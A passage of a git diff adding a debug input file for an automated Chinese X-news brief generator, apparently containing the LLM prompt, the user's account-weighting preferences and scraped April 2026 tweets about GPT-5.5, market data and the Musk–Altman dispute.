"权威机构披露高管不实行为细节,AI领域利益相关方强化信息披露审查标准", + "技术团队内部文件佐证管理争议,引发投资者对人工智能企业治理结构再审视" + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_011513_l1_stage1_input.txt b/data/x_brief/debug/20260428_011513_l1_stage1_input.txt new file mode 100644 index 0000000..ea0e962 --- /dev/null +++ b/data/x_brief/debug/20260428_011513_l1_stage1_input.txt @@ -0,0 +1,416 @@ +[meta] + +tweets=120 + +tweet_summary_chars=61510 + +phase=stage1_draft + + + +[prompt] + +你是“X资讯月报总编”。请先产出“结构草案 JSON”(阶段1),供后续阶段2定稿使用。 + +你必须遵循“用户配置文档”的偏好: +- 优先覆盖“我现在最关心的事”; +- 按“账号权重与偏好”做信息优先级排序(高权重账号更容易进入 themes/p0); +- 按“内容类型偏好(✅/❌)”进行取舍; +- 尽量贴合“简报格式偏好”的表达风格(中文总结为主,保留关键英文原句); +- 页面是固定模块位,内容应服务于前端模块整合,不要输出散乱信息。 + +阶段1输出要求(仅草案): +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 使用如下字段(严格保持键名): +{ + "themes":[{"id":"t1","title":"...","subtitle":"...","bullets":["..."],"sample_urls":["..."]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","item_urls":["..."],"item_texts":["..."]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +4) 每个模块优先包含可验证 URL;无法确定时宁缺毋滥。 +5) 内容必须中文,简洁可执行。 +6) JSON 必须合法:双引号、无注释、无尾逗号。 + +用户配置文档(用于本次简报编排): +# 我的 X 资讯简报配置 +> 这是一份活的文档。你可以随时手动编辑,Claude 也会根据你的阅读行为自动更新行为日志和权重建议。 +> 设计参考:Karpathy 的 LLM Wiki 模式——知识预编译,随时间积累。 + +**创建日期**:2026-04-26 +**最后更新**:2026-04-28(账号列表经核查优化:修正7处、新增5个、删除7个) + +--- + +## 一、我现在最关心的事 +> 这是简报的核心过滤器。Claude 在筛选和总结推文时,会优先选出和这里相关的内容放进主题卡片。 + +- 探索 AI 工具在投资研究和期权分析中的实际应用 +- 寻找值得在 B站分享的开源项目和 AI 工具(能快速跑通、有演示效果的优先) +- 跟上 AI 编程工具的发展(Claude Code、Cursor、Agent 相关) +- 了解顶级 VC 和行业领袖对 AI 下一步方向的判断 +- 关注 A股和美股宏观叙事的变化(尤其是科技板块) + +--- + +## 二、账号权重与偏好 + +> 权重分三档:高 / 中 / 低 +> 高权重账号:内容优先进入主题卡片 +> 中权重账号:有足够价值时进入快速扫读 +> 低权重账号:仅在有明确高价值内容时出现 + +### AI 行业 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @karpathy | Andrej Karpathy | 高 | 技术深度、可操作项目、AI编程实践 | 质量极高,几乎每条都值得看 | +| @sama | Sam Altman | 高 | 行业方向、产品发布 | 信息密度高,观点有参考价值 | +| @DarioAmodei | Dario Amodei | 高 | Anthropic动向、AI安全与能力 | Anthropic CEO,和Claude直接相关,新增 | +| @AravSrinivas | Aravind Srinivas | 高 | AI产品方向、搜索与Agent | Perplexity CEO,活跃度高,新增 | +| @AndrewYNg | Andrew Ng | 高 | 学习资源、AI教育、应用落地 | 对理解AI应用场景有帮助 | +| @ylecun | Yann LeCun | 中 | 研究方向、学术争论 | 偶尔有深度洞见,但争论性内容较多 | +| @JeffDean | Jeff Dean | 中 | 研究进展、Google AI动向 | 更新频率低,但含金量高 | +| @soumithchintala | Soumith Chintala | 中 | 开源框架、技术工具 | PyTorch相关,关注技术底层 | +| @gregbrockman | Greg Brockman | 中 | OpenAI产品动向 | 更新较少,有则关注 | +| @GaryMarcus | Gary Marcus | 低 | AI批评与反思 | 有参考价值但以质疑为主,权重偏低 | +| @elonmusk | Elon Musk | 低 | 偶尔有AI/科技相关 | 噪音多,仅关注有实质内容的推文 | + +### VC / 投资人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @paulg | Paul Graham | 高 | 创业思维、长文洞见 | 更新少但质量极高,每条都值得读 | +| @naval | Naval Ravikant | 高 | 思维框架、财富哲学 | 更新不频繁,但思想密度高 | +| @pmarca | Marc Andreessen | 高 | AI/科技政策、VC判断、行业叙事 | a16z联合创始人,极其活跃,2.1M粉,新增替换@lmsqueegie | +| @david_tiantian | David Tian Wang | 中 | 宏观分析、市场判断 | 原@david__tian(handle有误,已修正);账号实际发帖量约42条,活跃度一般 | +| @morganhousel | Morgan Housel | 中 | 投资心理、长期主义、行为金融 | 《Psychology of Money》作者,思想密度高,新增 | +| @eladgil | Elad Gil | 中 | AI投资趋势、公司判断 | 偶有高质量行业洞见 | +| @DavidSacks | David Sacks | 中 | 科技政策、VC视角 | 观点有时偏政治,筛选后看 | +| @HarryStebbings | Harry Stebbings | 低 | VC动态 | 内容较泛,权重低 | +| @jason | Jason Calacanis | 低 | 创业生态 | 噪音较多 | + +### 宏观与交易 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @charliebilello | Charlie Bilello | 高 | 宏观数据图表、资产类别轮动 | 每天发图表分析,数据驱动,新增;贴近A股/美股宏观叙事主线 | +| @WarriorTrading | Warrior Trading | 低 | 日内交易技术 | 偏教育/营销内容,仅保留;TradingGods/ProfTrading已移除(账号无法验证) | +| @CryptoCred | Credible Crypto | 低 | 加密趋势分析 | 加密相关,权重偏低 | +| @AltcoinBuzz | AltcoinBuzz | 低 | 币圈媒体 | 偏媒体性质,优先级低 | + +### 华语圈 + +> ⚠️ 注意:中文账号名的 X handle 无法被 Nitter RSS 正常抓取。以下账号需通过 X API 或手动采集。 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @二级炒家 | 二级炒家 | 高 | A股宏观、市场判断 | 和投资主线直接相关;⚠️ 中文handle,需X API | +| @svwang1 | 王川(硅谷) | 高 | 科技投资观察、深度思考 | 原@王川(已修正英文handle为@svwang1);质量高 | +| @liuliu | 刘进 | 中 | VC投资、华语科技圈 | 英文handle,Nitter可用 | + +--- + +## 三、内容类型偏好 + +### ✅ 优先展示 +- **可操作的项目/工具**:有 GitHub 链接、可以立刻尝试的内容 +- **AI 编程实践**:提示词技巧、Agent 搭建、工作流分享 +- **行业方向判断**:顶级 VC 或创始人对未来的预测和押注 +- **宏观与投资叙事**:A股、美股科技板块的结构性变化 +- **中文圈独特视角**:英文圈没有的本地化洞见 + +### ❌ 降低优先级 +- 纯政治观点(和 AI/投资无关的) +- 加密货币炒作、价格预测类 +- 互相转发的无实质内容互动 +- 重复已知信息的科普 + +--- + +## 四、简报格式偏好 + +``` +📰 AI & 投资日报 · [日期] + +【30秒总览】一句话概括今日主旋律 + +━━━━━━━━━━━━━ +🔥 今日主题卡片(2~3个) +每张卡片包含: + - 主题标签 + - 核心洞见(1~2句) + - 来源账号 + - 你可以做什么(可操作建议) + +━━━━━━━━━━━━━ +⚡ 快速扫读(剩余有价值内容) + +━━━━━━━━━━━━━ +🀄 华语圈单独板块 + +━━━━━━━━━━━━━ +📌 本期可以跟着做的事 + +━━━━━━━━━━━━━ +😴 今日无新内容的账号 +``` + +**语言**:中文总结为主,保留有分量的英文原句 +**长度**:10分钟内可以读完 +**主题卡片数量**:每日 2~3 个,宁缺毋滥 + +--- + +## 五、行为日志 +> 由 Claude 根据你的互动自动追加。记录有意义的偏好信号,作为未来权重调整的依据。 + +| 日期 | 行为 | 内容摘要 | 影响 | +|------|------|----------|------| +| 2026-04-26 | 初始配置建立 | 人工设定初始权重 | — | +| 2026-04-28 | 账号列表核查优化 | Web搜索核查全部33个账号的真实性与活跃度 | 见变更日志 | + +--- + +## 六、待解决的遗留问题 +> 系统尚未实现的功能,记录在此,后续迭代时参考。 + +- [ ] 账号内容类型自动分类(通用知识型 vs 项目介绍型),不同类型反馈权重不同 +- [ ] 点踩行为如何自动写回本文件并影响下次抓取权重 +- [ ] 新账号发现与加入机制(何时、如何引入新的关注对象) +- [ ] 账号沉默超过 N 天自动降权的规则实现 + +上下文(摘要): +# X平台关注列表推文汇总 + +**生成日期**: 2026-04-27T17:15:13.448908+00:00 +**数据来源**: Nitter RSS 订阅 +**时间范围**: 最近7天 +**账号总数**: 27 | **成功获取**: 21 | **推文总数**: 259 + +--- + +### ✅ @karpathy — Andrej Karpathy(1 条) + +**[2026-04-22T16:00:05+00:00]** +> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built… +[原文链接](https://x.com/karpathy/status/2046982383430496444) + +--- + +### ✅ @sama — Sam Altman(20 条) + +**[2026-04-27T13:24:26+00:00]** +> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr… +[原文链接](https://x.com/sama/status/2048755148361707946) + +**[2026-04-27T13:09:30+00:00]** +> this is so good: https://paulgraham.com/kids.html +[原文链接](https://x.com/sama/status/2048751392031203544) + +**[2026-04-27T00:05:31+00:00]** +> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful. +[原文链接](https://x.com/sama/status/2048554097985593849) + +**[2026-04-26T23:59:53+00:00]** +> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/ +[原文链接](https://x.com/sama/status/2048552677433643427) + +**[2026-04-26T15:46:41+00:00]** +> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents) +[原文链接](https://x.com/sama/status/2048428561481265539) + +**[2026-04-26T15:37:00+00:00]** +> "post-AGI, no one is going to work and the economy is going to collapse" "i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret… +[原文链接](https://x.com/sama/status/2048426122854228141) + +**[2026-04-26T02:15:19+00:00]** +> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day +[原文链接](https://x.com/sama/status/2048224374264885396) + +**[2026-04-25T22:20:08+00:00]** +> how can they write code so fast?! +[原文链接](https://x.com/sama/status/2048165186482389253) + +**[2026-04-25T22:01:18+00:00]** +> R to @sama: (and we will fix the former) +[原文链接](https://x.com/sama/status/2048160448340767038) + +**[2026-04-25T22:01:08+00:00]** +> we still get looksmaxxed on frontend a little but we IQmog hard now +[原文链接](https://x.com/sama/status/2048160404376105179) + +**[2026-04-25T15:31:08+00:00]** +> 5.5 is so earnest "little engine that could" energy +[原文链接](https://x.com/sama/status/2048062261584077149) + +**[2026-04-24T23:41:49+00:00]** +> this was a good week. proud of the team. happy building! +[原文链接](https://x.com/sama/status/2047823357635354814) + +**[2026-04-24T21:17:51+00:00]** +> GPT-5.5 and GPT-5.5 Pro are now available in the API! +[原文链接](https://x.com/sama/status/2047787124846653895) + +**[2026-04-24T14:27:13+00:00]** +> 🫶 +[原文链接](https://x.com/sama/status/2047683787828703289) + +**[2026-04-24T00:33:16+00:00]** +> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor… +[原文链接](https://x.com/sama/status/2047473914528563592) + +**[2026-04-23T19:54:32+00:00]** +> "don't retweet this, don't retweet this, don't retweet this..." ah fuck it, life imitates art. +[原文链接](https://x.com/sama/status/2047403771416940715) + +**[2026-04-23T19:21:55+00:00]** +> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company! +[原文链接](https://x.com/sama/status/2047395562501411058) + +**[2026-04-23T19:09:11+00:00]** +> embers +[原文链接](https://x.com/sama/status/2047392357482639749) + +**[2026-04-23T18:47:43+00:00]** +> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up … +[原文链接](https://x.com/sama/status/2047386955550470245) + +**[2026-04-23T18:26:18+00:00]** +> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy! +[原文链接](https://x.com/sama/status/2047381565534322694) + +--- + +### ✅ @DarioAmodei — Dario Amodei(0 条) + +--- + +### ✅ @AravSrinivas — Aravind Srinivas(10 条) + +**[2026-04-24T21:24:24+00:00]** +> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr… +[原文链接](https://x.com/AravSrinivas/status/2047788775468908840) + +**[2026-04-24T19:03:21+00:00]** +> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y… +[原文链接](https://x.com/AravSrinivas/status/2047753276888854595) + +**[2026-04-24T18:44:19+00:00]** +> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047748486767272243) + +**[2026-04-23T02:46:57+00:00]** +> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047145172337836139) + +**[2026-04-22T18:28:20+00:00]** +> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c… +[原文链接](https://x.com/AravSrinivas/status/2047019688920756504) + +**[2026-04-22T18:15:16+00:00]** +> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an… +[原文链接](https://x.com/AravSrinivas/status/2047016400292839808) + +**[2026-04-21T17:14:42+00:00]** +> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages. +[原文链接](https://x.com/AravSrinivas/status/2046638770162995603) + +**[2026-04-21T15:06:26+00:00]** +> ⌘ ⌘ +[原文链接](https://x.com/AravSrinivas/status/2046606492649091212) + +**[2026-04-21T02:43:37+00:00]** +> RT by @AravSrinivas: Whoa 🤯 +[原文链接](https://x.com/AravSrinivas/status/2046419556424675677) + +**[2026-04-20T21:57:10+00:00]** +>  +[原文链接](https://x.com/AravSrinivas/status/2046347469488107839) + +--- + +### ✅ @AndrewYNg — Andrew Ng(1 条) + +**[2026-04-27T15:58:13+00:00]** +> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to… +[原文链接](https://x.com/AndrewYNg/status/2048793852702757151) + +--- + +### ✅ @ylecun — Yann LeCun(19 条) + +**[2026-04-26T18:31:11+00:00]** +> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,… +[原文链接](https://x.com/ylecun/status/2048469956627468510) + +**[2026-04-26T17:27:23+00:00]** +> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is … +[原文链接](https://x.com/ylecun/status/2048453901930660058) + +**[2026-04-26T16:03:04+00:00]** +> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for… +[原文链接](https://x.com/ylecun/status/2048432684930654430) + +**[2026-04-26T13:51:41+00:00]** +> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex. +[原文链接](https://x.com/ylecun/status/2048399621492236615) + +**[2026-04-26T06:48:29+00:00]** +> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an… +[原文链接](https://x.com/ylecun/status/2048293118781296734) + +**[2026-04-25T19:15:22+00:00]** +> RT by @ylecun: OPINION: "Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing." https://ebx.sh/V5… +[原文链接](https://x.com/ylecun/status/2048118689258487857) + +**[2026-04-25T16:01:07+00:00]** +> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN… +[原文链接](https://x.com/ylecun/status/2048069805807128734) + +**[2026-04-24T20:50:37+00:00]** +> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53… +[原文链接](https://x.com/ylecun/status/2047780272297382384) + +**[2026-04-24T19:31:52+00:00]** +> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what "goo… +[原文链接](https://x.com/ylecun/status/2047760455679246500) + +**[2026-04-24T17:45:08+00:00]** +> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in … +[原文链接](https://x.com/ylecun/status/2047733594064408894) + +**[2026-04-24T15:23:18+00:00]** +> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能… +[原文链接](https://x.com/ylecun/status/2047697898989572176) + +**[2026-04-24T14:14:06+00:00]** +> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their… +[原文链接](https://x.com/ylecun/status/2047680485208531152) + +**[2026-04-24T13:58:49+00:00]** +> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also … +[原文链接](https://x.com/ylecun/status/2047676640059154653) + +**[2026-04-24T11:19:36+00:00]** +> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th… +[原文链接](https://x.com/ylecun/status/2047636569767419951) + +**[2026-04-24T10:30:09+00:00]** +> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI… +[原文链接](https://x.com/ylecun/status/2047624126047670758) + +**[2026-04-24T06:38:08+00:00]** +> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la "Savage Nation". Ce texte inhabituellement long, inhabi… +[原文链接](https://x.com/ylecun/status/2047565736382534091) + +**[2026-04-23T23:15:06+00:00]** +> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇 +[原文链接](https://x.com/ylecun/status/2047454244781818205) + +**[202 + +推文样本(JSON): +[{"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:54:21+00:00", "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", "url": "https://x.com/elonmusk/status/2048807976991850953"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:39:59+00:00", "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of con", "url": "https://x.com/elonmusk/status/2048804363595059425"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:31:33+00:00", "title": "Exactly", "url": "https://x.com/elonmusk/status/2048802239272169582"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:30:27+00:00", "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style. After this lawsuit, Scam will also be awarded tens of billions i", "url": "https://x.com/elonmusk/status/2048801964457140540"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:21:30+00:00", "title": "Scam Altman", "url": "https://x.com/elonmusk/status/2048799712375902624"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T16:21:01+00:00", "title": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", "url": "https://x.com/charliebilello/status/2048799590044852390"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:13:00+00:00", "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/st", "url": "https://x.com/jason/status/2048797572014207114"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:10:40+00:00", "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/", "url": "https://x.com/jason/status/2048796982227972344"}, {"handle": "AndrewYNg", "name": "Andrew Ng", "published_at": "2026-04-27T15:58:13+00:00", "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play", "url": "https://x.com/AndrewYNg/status/2048793852702757151"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:56:52+00:00", "title": "RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱", "url": "https://x.com/elonmusk/status/2048793511701717143"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:56:20+00:00", "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust freq", "url": "https://x.com/jason/status/2048793378511536538"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:50:31+00:00", "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", "url": "https://x.com/GaryMarcus/status/2048791912149295182"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:33:34+00:00", "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", "url": "https://x.com/GaryMarcus/status/2048787646206677207"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:31:37+00:00", "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", "url": "https://x.com/GaryMarcus/status/2048787157536653627"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:26:33+00:00", "title": "RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions.\n\n\"I truly believe, like in my soul, that he is trying to help humanity.\"\n\n\"He has these goals. Like back up the biosphere by making us a multi-planetary species or ush", "url": "https://x.com/elonmusk/status/2048785882950549854"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:15:09+00:00", "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", "url": "https://x.com/elonmusk/status/2048783014075777369"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:03:32+00:00", "title": "Best accounts for following Austin air quality? @grok", "url": "https://x.com/jason/status/2048780089295302690"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T14:53:45+00:00", "title": "Excellent point", "url": "https://x.com/elonmusk/status/2048777628019032335"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T14:27:36+00:00", "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", "url": "https://x.com/GaryMarcus/status/2048771044987777428"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", "url": "https://x.com/HarryStebbings/status/2048764743205134644"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per", "url": "https://x.com/HarryStebbings/status/2048764741435179442"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:50:42+00:00", "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0T", "url": "https://x.com/charliebilello/status/2048761760971096534"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-27T13:40:08+00:00", "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", "url": "https://x.com/JeffDean/status/2048759102390899142"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T13:32:43+00:00", "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system", "url": "https://x.com/GaryMarcus/status/2048757233174122827"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T13:30:16+00:00", "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go ", "url": "https://x.com/HarryStebbings/status/2048756619622707452"}, {"handle": "soumithchintala", "name": "Soumith Chintala", "published_at": "2026-04-27T13:29:14+00:00", "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to ", "url": "https://x.com/soumithchintala/status/2048756358820827564"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:24:26+00:00", "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 203", "url": "https://x.com/sama/status/2048755148361707946"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:16:36+00:00", "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", "url": "https://x.com/charliebilello/status/2048753179471323584"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:09:30+00:00", "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", "url": "https://x.com/sama/status/2048751392031203544"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:08:19+00:00", "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048751094671585397"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T12:53:00+00:00", "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", "url": "https://x.com/charliebilello/status/2048747238986305979"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:50:55+00:00", "title": "RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial.\n\nTwo opposing worldviews. \nSam Altman transformed a non-profit organization into one of the world's most profitable companies for his own enrichment.\n\n Elon Musk, who did everything he could to limit the", "url": "https://x.com/elonmusk/status/2048746715805581608"}, {"handle": "GaryMarcus", "name": "Gary 